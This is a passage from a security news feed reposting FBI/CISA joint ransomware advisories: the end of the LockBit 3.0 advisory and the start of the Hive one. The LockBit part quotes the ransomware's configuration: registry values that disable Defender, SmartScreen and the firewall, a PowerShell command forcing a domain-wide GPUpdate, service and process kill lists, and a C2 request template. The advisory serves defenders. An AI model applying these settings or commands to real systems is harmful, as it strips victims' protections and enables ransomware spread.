			name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SQLWriter" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="SQLTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="SQLTELEMETRY" serviceaction="STOP" timeout="30"></properties><br><br><ntservice clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"></ntservice>
			name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0"&gt;<br><properties startuptype="DISABLED" servicename="MSSQLSERVER" serviceaction="STOP" timeout="60"></properties><br><br></ntservices></td>
</tr></tbody></table><h6>Registry.pol</h6>
<p>The following registry configuration changes values for the Group Policy refresh time, disable SmartScreen, and disable Windows Defender.</p>
<table><thead><tr><th scope="col">Registry Key</th>
<th scope="col">Registry Value</th>
<th scope="col">Value type</th>
<th scope="col">Data</th>
</tr></thead><tbody><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s\System</pre></td>
<td>
<pre>
GroupPolicyRefresh
TimeDC</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
1</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s\System</pre></td>
<td>
<pre>
GroupPolicyRefresh
TimeOffsetDC</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
1</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s\System</pre></td>
<td>
<pre>
GroupPolicyRefresh
Time</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
1</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s\System</pre></td>
<td>
<pre>
GroupPolicyRefresh
TimeOffset</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
1</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s\System</pre></td>
<td>
<pre>
EnableSmartScreen</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
0</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s\System</pre></td>
<td>
<pre>
**del.ShellSmartSc
reenLevel</pre></td>
<td>
<pre>
REG_S
Z</pre></td>
<td>
<pre>
 </pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender</pre></td>
<td>
<pre>
DisableAntiSpyware</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
1</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender</pre></td>
<td>
<pre>
DisableRoutinelyTa
kingAction</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
1</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender\Real-Time Protection</pre></td>
<td>
<pre>
DisableRealtimeMon
itoring</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
1</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender\Real-Time Protection</pre></td>
<td>
<pre>
DisableBehaviorMon
itoring</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
1</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender\Spynet</pre></td>
<td>
<pre>
SubmitSamplesConse
nt</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
2</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
s Defender\Spynet</pre></td>
<td>
<pre>
SpynetReporting</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
0</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
sFirewall\DomainProfile</pre></td>
<td>
<pre>
EnableFirewall</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
0</pre></td>
</tr><tr><td>
<pre>
HKLM\SOFTWARE\Policies\Microsoft\Window
sFirewall\StandardProfile</pre></td>
<td>
<pre>
EnableFirewall</pre></td>
<td>
<pre>
REG_D
WORD</pre></td>
<td>
<pre>
0</pre></td>
</tr></tbody></table><h6>Force GPUpdate</h6>
<p>Once new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the new group policy changes to all computers on the AD domain.</p>
<table><thead><tr><th scope="col">Force GPUpdate Powershell Command</th>
</tr></thead><tbody><tr><td>powershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke- GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}</td>
</tr></tbody></table><h6>Services Killed</h6>
<table><tbody><tr><td>vss</td>
<td>sql</td>
<td>svc$</td>
</tr><tr><td>memtas</td>
<td>mepocs</td>
<td>msexchange</td>
</tr><tr><td>sophos</td>
<td>veeam</td>
<td>backup</td>
</tr><tr><td>GxVss</td>
<td>GxBlr</td>
<td>GxFWD</td>
</tr><tr><td>GxCVD</td>
<td>GxCIMgr</td>
<td> </td>
</tr></tbody></table><h6>Processes Killed</h6>
<table><tbody><tr><td>sql</td>
<td>oracle</td>
<td>ocssd</td>
</tr><tr><td>dbsnmp</td>
<td>synctime</td>
<td>agntsvc</td>
</tr><tr><td>isqlplussvc</td>
<td>xfssvccon</td>
<td>mydesktopservice</td>
</tr><tr><td>ocautoupds</td>
<td>encsvc</td>
<td>firefox</td>
</tr><tr><td>tbirdconfig</td>
<td>mydesktopqos</td>
<td>ocomm</td>
</tr><tr><td>dbeng50</td>
<td>sqbcoreservice</td>
<td>excel</td>
</tr><tr><td>infopath</td>
<td>msaccess</td>
<td>mspu</td>
</tr><tr><td>onenote</td>
<td>outlook</td>
<td>powerpnt</td>
</tr><tr><td>steam</td>
<td>thebat</td>
<td>thunderbird</td>
</tr><tr><td>visio</td>
<td>winword</td>
<td>wordpad</td>
</tr><tr><td>notepad</td>
<td> </td>
<td> </td>
</tr></tbody></table><h6>LockBit 3.0 Ransom Note</h6>
<blockquote><p>~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~<br>
&gt;&gt;&gt;&gt;&gt; Your data is stolen and encrypted.<br>
If you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data appears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time. The sooner you pay the ransom, the sooner your company will be safe.</p>
</blockquote>
<h6>Network Connections</h6>
<p>If configured, Lockbit 3.0 will send two HTTP POST requests to one of the C2servers. Information about the victim host and bot are encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.</p>
<table><tbody><tr><td>
<pre>
Example of HTTP POST request
POST <strong><lockbit c2></lockbit></strong>/?7F6Da=u5a0TdP0&amp;Aojq=&amp;NtN1W=OuoaovMvrVJSmPNaA5&amp;fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br Content-Type: text/plain
User-Agent: Safari/537.36 <strong><lockbit user agent string></lockbit></strong>
Host: <strong><lockbit c2></lockbit></strong>
Connection: Keep-Alive LIWy=RJ51lB5GM&amp;a4OuN=<strong><em><lockbit></lockbit></em></strong>&amp;LoSyE3=8SZ1hdlhzld4&amp;DHnd99T=rTx9xGlInO6X0zWW&amp;2D6=Bokz&amp;T1guL=MtRZsFCRMKyBmfmqI&amp; 6SF3g=JPDt9lfJIQ&amp;wQadZP=<strong><em><base64 encrypted data></base64></em></strong> Xni=AboZOXwUw&amp;2rQnM4=94L&amp;0b=ZfKv7c&amp;NO1d=M2kJlyus&amp;AgbDTb=xwSpba&amp;8sr=EndL4n0HVZjxPR&amp; m4ZhTTH=sBVnPY&amp;xZDiygN=cU1pAwKEztU&amp;=5q55aFIAfTVQWTEm&amp;4sXwVWcyhy=l68FrIdBESIvfCkvYl
Example of information found in encrypted data
{
"bot_version":"X",
"bot_id":"X",
"bot_company":"X", "host_hostname":"X", "host_user":"X",
"host_os":"X",
"host_domain":"X",
"host_arch":"X",
"host_lang":"X", "disks_info":[
{
"disk_name":"X",
"disk_size":"XXXX", "free_size":"XXXXX"
}</pre></td>
</tr></tbody></table><h6>User Agent Strings</h6>
<table><tbody><tr><td>Mozilla/5.0 (Windows NT<br>
			6.1)</td>
<td>AppleWebKit/587.38<br>
			(KHTML, like Gecko)</td>
<td>Chrome/91.0.4472.77</td>
</tr><tr><td>Safari/537.36</td>
<td>Edge/91.0.864.37</td>
<td>Firefox/89.0</td>
</tr><tr><td>Gecko/20100101</td>
<td> </td>
<td> </td>
</tr></tbody></table><h4><strong>MITRE ATT&amp;CK TECHNIQUES</strong></h4>
<p>See Table 3 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&amp;CK framework, see CISA’s <a href="https://www.cisa.gov/news-events/alerts/2023/03/01/cisa-releases-decider-tool-help-mitre-attck-mapping">Decider Tool</a> and <a href="https://www.cisa.gov/news-events/alerts/2023/01/17/cisa-updates-best-practices-mapping-mitre-attckr">Best Practices for MITRE ATT&amp;CK Mapping Guide</a>.</p>
<table><caption><em>Table 3: LockBit 3.0 Actors ATT&amp;CK Techniques for Enterprise</em></caption>
<thead><tr><th scope="col"><u>Initial Access</u></th>
<th scope="col"> </th>
<th scope="col"> </th>
</tr></thead><tbody><tr><th>Technique Title</th>
<th>ID</th>
<th>Use</th>
</tr><tr><td>Valid Accounts</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1078/">T1078</a></td>
<td>LockBit 3.0 actors obtain and abuse credentials of existing accounts as a means of gaining initial access.</td>
</tr><tr><td>Exploit External Remote Services</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1133/">T1133</a></td>
<td>LockBit 3.0 actors exploit RDP to gain access to victim networks.</td>
</tr><tr><td>Drive-by Compromise</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1189/">T1189</a></td>
<td>LockBit 3.0 actors gain access to a system through a user visiting a website over the normal course of browsing.</td>
</tr><tr><td>Exploit Public-Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1190/">T1190</a></td>
<td>LockBit 3.0 actors exploit vulnerabilities in internet-facing systems to gain access to victims’ systems.</td>
</tr><tr><td>Phishing</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1566/">T1566</a></td>
<td>LockBit 3.0 actors use phishing and spearphishing to gain access to victims' networks.</td>
</tr><tr><th><u><strong>Execution</strong></u></th>
<th> </th>
<th> </th>
</tr><tr><th>Technique Title</th>
<th>ID</th>
<th>Use</th>
</tr><tr><td>Execution</td>
<td><a href="https://attack.mitre.org/versions/v12/tactics/TA0002/">TA0002</a></td>
<td>LockBit 3.0 launches commands during its execution.</td>
</tr><tr><td>Software Deployment Tools</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1072/">T1072</a></td>
<td>LockBit 3.0 uses Chocolatey, a command- line package manager for Windows.</td>
</tr><tr><th><u><strong>Persistence</strong></u></th>
<th> </th>
<th> </th>
</tr><tr><th>Technique Title</th>
<th>ID</th>
<th>Use</th>
</tr><tr><td>Valid Accounts</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1078/">T1078</a></td>
<td>LockBit 3.0 uses a compromised user account to maintain persistence on the target network.</td>
</tr><tr><td>Boot or Logo Autostart Execution</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1547/">T1547</a></td>
<td>LockBit 3.0 enables automatic logon for persistence.</td>
</tr><tr><th><strong><u>Privilege Escalation</u></strong></th>
<th> </th>
<th> </th>
</tr><tr><th>Technique Title</th>
<th>ID</th>
<th>Use</th>
</tr><tr><td>Privilege Escalation</td>
<td><a href="https://attack.mitre.org/versions/v12/tactics/TA0004/">TA0004</a></td>
<td>Lockbit 3.0 will attempt to escalate to the required privileges if current account privileges are insufficient.</td>
</tr><tr><td>Boot or Logo Autostart Execution</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1547/">T1547</a></td>
<td>LockBit 3.0 enables automatic logon for privilege escalation.</td>
</tr><tr><th><u><strong>Defense Evasion</strong></u></th>
<th> </th>
<th> </th>
</tr><tr><th>Technique Title</th>
<th>ID</th>
<th>Use</th>
</tr><tr><td>Obfuscated Files or Information</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1027/">T1027</a></td>
<td>LockBit 3.0 will send encrypted host and bot information to its C2 servers.</td>
</tr><tr><td>Indicator Removal: File Deletion</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1070/004/">T1070.004</a></td>
<td>LockBit 3.0 will delete itself from the disk.</td>
</tr><tr><td>Execution Guardrails: Environmental Keying</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1480/001/">T1480.001</a></td>
<td>LockBit 3.0 will only decrypt the main component or continue to decrypt and/or decompress data if the correct password is entered.</td>
</tr><tr><th><u><strong>Credential Access</strong></u></th>
<th> </th>
<th> </th>
</tr><tr><th>Technique Title</th>
<th>ID</th>
<th>Use</th>
</tr><tr><td>OS Credential Dumping: LSASS Memory</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1003/001/">T1003.001</a></td>
<td>LockBit 3.0 uses Microsoft Sysinternals ProDump to dump the contents of LSASS.exe.</td>
</tr><tr><th><u><strong>Discovery</strong></u></th>
<th> </th>
<th> </th>
</tr><tr><th>Technique Title</th>
<th>ID</th>
<th>Use</th>
</tr><tr><td>Network Service Discovery</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1046/">T1046</a></td>
<td>LockBit 3.0 uses SoftPerfect Network Scanner to scan target networks.</td>
</tr><tr><td>System Information Discovery</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1082/">T1082</a></td>
<td>LockBit 3.0 will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices.</td>
</tr><tr><td>System Location   Discovery: System Language Discovery</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1614/001/">T1614.001</a></td>
<td>LockBit 3.0 will not infect machines with language settings that match a defined exclusion list.</td>
</tr><tr><th><strong><u>Lateral Movement</u></strong></th>
<th> </th>
<th> </th>
</tr><tr><th>Technique Title</th>
<th>ID</th>
<th>Use</th>
</tr><tr><td>Remote Services:   Remote Desktop Protocol</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1021/001/">T1021.001</a></td>
<td>LockBit 3.0 uses Splashtop remote- desktop software to facilitate lateral movement.</td>
</tr><tr><th><strong><u>Command and Control</u></strong></th>
<th> </th>
<th> </th>
</tr><tr><th>Technique Title</th>
<th>ID</th>
<th>Use</th>
</tr><tr><td>Application Layer Protocol: File Transfer Protocols</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1071/002/">T1071.002</a></td>
<td>LockBit 3.0 uses FileZilla for C2.</td>
</tr><tr><td>Protocol Tunnel</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1572/">T1572</a></td>
<td>LockBit 3.0 uses Plink to automate SSH actions on Windows.</td>
</tr><tr><th><u><strong>Exfiltration</strong></u></th>
<th> </th>
<th> </th>
</tr><tr><th>Technique Title</th>
<th>ID</th>
<th>Use</th>
</tr><tr><td>Exfiltration</td>
<td><a href="https://attack.mitre.org/versions/v12/tactics/TA0010/">TA0010</a></td>
<td>LockBit 3.0 uses Stealbit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network.</td>
</tr><tr><td>Exfiltration Over Web Service</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1567/">T1567</a></td>
<td>LockBit 3.0 uses publicly available file sharing services to exfiltrate a target’s data.</td>
</tr><tr><td>Exfiltration Over Web Service: Exfiltration to Cloud Storage</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1567/002/">T1567.002</a></td>
<td>LockBit 3.0 actors use (1) rclone, an open source command line cloud storage manager to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration.</td>
</tr><tr><th><strong><u>Impact</u></strong></th>
<th> </th>
<th> </th>
</tr><tr><th>Technique Title</th>
<th>ID</th>
<th>Use</th>
</tr><tr><td>Data Destruction</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1485/">T1485</a></td>
<td>LockBit 3.0 deletes log files and empties the recycle bin.</td>
</tr><tr><td>Data Encrypted for Impact</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1486/">T1486</a></td>
<td>LockBit 3.0 encrypts data on target systems to interrupt availability to system and network resources.</td>
</tr><tr><td>Service Stop</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1489/">T1489</a></td>
<td>LockBit 3.0 terminates processes and services.</td>
</tr><tr><td>Inhibit System Recovery</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1490/">T1490</a></td>
<td>LockBit 3.0 deletes volume shadow copies residing on disk.</td>
</tr><tr><td>Defacement: Internal Defacement</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1491/001/">T1491.001</a></td>
<td>LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively.</td>
</tr></tbody></table><h4><strong>MITIGATIONS</strong></h4>
<p>The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA’s <a href="https://www.cisa.gov/cpg">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul><li><strong>Implement a recovery plan</strong> to maintain and retain multiple copies of sensitive or proprietary data and servers [<a href="https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf">CPG 7.3</a>] in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud).</li>
<li><strong>Require all accounts</strong> with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with <a href="https://pages.nist.gov/800-63-3/">National Institute for Standards and Technology (NIST) standards</a> for developing and managing password policies [<a href="https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf">CPG 3.4</a>].
<ul><li>Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [<a href="https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf">CPG 1.4</a>]</li>
<li>Store passwords in hashed format using industry-recognized password managers</li>
<li>Add password user “salts” to shared login credentials</li>
<li>Avoid reusing passwords</li>
<li>Implement multiple failed login attempt account lockouts [<a href="https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf">CPG 1.1</a>]</li>
<li>Disable password “hints”</li>
<li>Refrain from requiring password changes more frequently than once per year. <strong>Note: </strong>NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.</li>
<li>Require administrator credentials to install software</li>
</ul></li>
<li><strong>Require phishing-resistant multifactor authentication</strong> [<a href="https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf">CPG 1.3</a>] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.</li>
<li><strong>Keep all operating systems, software, and firmware up to date.</strong> Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.</li>
<li><strong>Segment networks</strong> [<a href="https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf">CPG 8.1</a>] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.</li>
<li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.</strong> To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network [<a href="https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf">CPG 5.1</a>]. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.</li>
<li><strong>Install, regularly update, and enable real time detection for antivirus software</strong> on all hosts.</li>
<li><strong>Review domain controllers, servers, workstations, and active directories</strong> for new and/or unrecognized accounts.</li>
<li><strong>Audit user accounts</strong> with administrative privileges and configure access controls according to the principle of least privilege [<a href="https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf">CPG 1.5</a>].</li>
<li><strong>Disable unused ports.</strong></li>
<li><strong>Consider adding an email banner to emails </strong>[<a href="https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf">CPG 8.3</a>] received from outside your organization.</li>
<li><strong>Disable hyperlinks</strong> in received emails.</li>
<li><strong>Implement time-based access for accounts set at the admin level and higher.</strong> For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.</li>
<li><strong>Disable command-line and scripting activities and permissions.</strong> Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.</li>
<li><strong>Maintain offline backups of data,</strong> and regularly maintain backup and restoration [<a href="https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf">CPG 7.3</a>]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.</li>
<li><strong>Ensure all backup data is encrypted, immutable </strong>(i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [<a href="https://www.cisa.gov/sites/default/files/publications/2022_00092_CISA_CPG_Report_508c.pdf">CPG 3.3</a>].</li>
</ul><h4><strong>VALIDATE SECURITY CONTROLS</strong></h4>
<p>In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.<br>
To get started:</p>
<ol><li>Select an ATT&amp;CK technique described in this advisory (see Table 3).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol><p>The FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h4><strong>RESOURCES</strong></h4>
<ul><li><a href="https://www.stopransomware.gov/">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
<li>Resource to mitigate a ransomware attack: <a href="https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf">CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide</a>.</li>
<li>No-cost cyber hygiene services: <a href="https://www.cisa.gov/cyber-hygiene-services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0">Ransomware Readiness Assessment</a>.</li>
</ul><h4><strong>REPORTING</strong></h4>
<p>The FBI is seeking any information that can be legally shared, including:</p>
<ul><li>Boundary logs showing communication to and from foreign IP addresses</li>
<li>Sample ransom note</li>
<li>Communications with LockBit 3.0 actors</li>
<li>Bitcoin wallet information</li>
<li>Decryptor files</li>
<li>Benign sample of an encrypted file</li>
</ul><p>The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a <a href="https://www.fbi.gov/contact-us/field-offices">local FBI Field Office</a> or CISA at <a href="mailto:report@cisa.gov">report@cisa.gov</a>. State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (<a href="mailto:SOC@cisecurity.org">SOC@cisecurity.org</a> or 866-787-4722).</p>
<h4><strong>DISCLAIMER</strong></h4>
<p>The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[#StopRansomware: Hive Ransomware]]></title>
<description><![CDATA[Summary

Actions to Take Today to Mitigate Cyber Threats from Ransomware:
• Prioritize remediating known exploited vulnerabilities.
• Enable and enforce multifactor authentication with strong passwords
• Close unused ports and remove any application not deemed necessary for day-to-day operations....]]></description>
<link>https://tsecurity.de/de/1812979/sicherheitsluecken/stopransomware-hive-ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1812979/sicherheitsluecken/stopransomware-hive-ransomware/</guid>
<pubDate>Tue, 07 Mar 2023 06:28:58 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<h3>Summary</h3>
</div>
<p>Actions to Take Today to Mitigate Cyber Threats from Ransomware:</p>
<p>• Prioritize remediating <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">known exploited vulnerabilities</a>.<br>
• Enable and enforce multifactor authentication with strong passwords<br>
• Close unused ports and remove any application not deemed necessary for day-to-day operations.</p>
<p><em>Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit <a href="https://www.cisa.gov/stopransomware">stopransomware.gov</a> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
<p>The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known Hive IOCs and TTPs identified through FBI investigations as recently as November 2022.</p>
<p>FBI, CISA, and HHS encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. Victims of ransomware operations should report the incident to their local FBI field office or CISA.</p>
<p>Download the PDF version of this report: <a href="https://www.cisa.gov/sites/default/files/publications/aa22-321a_joint_csa_stopransomware_hive.pdf">pdf, 852.9 kb</a>.</p>
<p>For a downloadable copy of IOCs, see <a href="https://www.cisa.gov/sites/default/files/publications/AA22-321A.stix.xml">AA22-321A.stix</a> (STIX, 43.6 kb).</p>
<div>
<h3>Technical Details</h3>
</div>
<p><em>Note: This advisory uses the MITRE ATT&amp;CK® for Enterprise framework, version 12. See <a href="https://attack.mitre.org/versions/v12/matrices/enterprise/">MITRE ATT&amp;CK for Enterprise</a> for all referenced tactics and techniques.</em></p>
<p>As of November 2022, Hive ransomware actors have victimized over 1,300 companies worldwide, receiving approximately US$100 million in ransom payments, according to FBI information. Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks. From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH).</p>
<p>The method of initial intrusion will depend on which affiliate targets the network. Hive actors have gained initial access to victim networks by using single factor logins via Remote Desktop Protocol (RDP), virtual private networks (VPNs), and other remote network connection protocols [<a href="https://attack.mitre.org/versions/v12/techniques/T1133/">T1133</a>]. In some cases, Hive actors have bypassed multifactor authentication (MFA) and gained access to FortiOS servers by exploiting Common Vulnerabilities and Exposures (CVE) <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-12812">CVE-2020-12812</a>. This vulnerability enables a malicious cyber actor to log in without a prompt for the user’s second authentication factor (FortiToken) when the actor changes the case of the username.</p>
<p>Hive actors have also gained initial access to victim networks by distributing phishing emails with malicious attachments [<a href="https://attack.mitre.org/versions/v12/techniques/T1566/001/">T1566.001</a>] and by exploiting the following vulnerabilities against Microsoft Exchange servers [<a href="https://attack.mitre.org/versions/v12/techniques/T1190/">T1190</a>]:</p>
<ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-31207">CVE-2021-31207</a> - Microsoft Exchange Server Security Feature Bypass Vulnerability</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-34473">CVE-2021-34473</a> - Microsoft Exchange Server Remote Code Execution Vulnerability</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-34523">CVE-2021-34523</a> - Microsoft Exchange Server Privilege Escalation Vulnerability</li>
</ul><p>After gaining access, Hive ransomware attempts to evade detention by executing processes to:</p>
<ul><li>Identify processes related to backups, antivirus/anti-spyware, and file copying and then terminating those processes to facilitate file encryption [<a href="https://attack.mitre.org/versions/v12/techniques/T1562/001/">T1562</a>].</li>
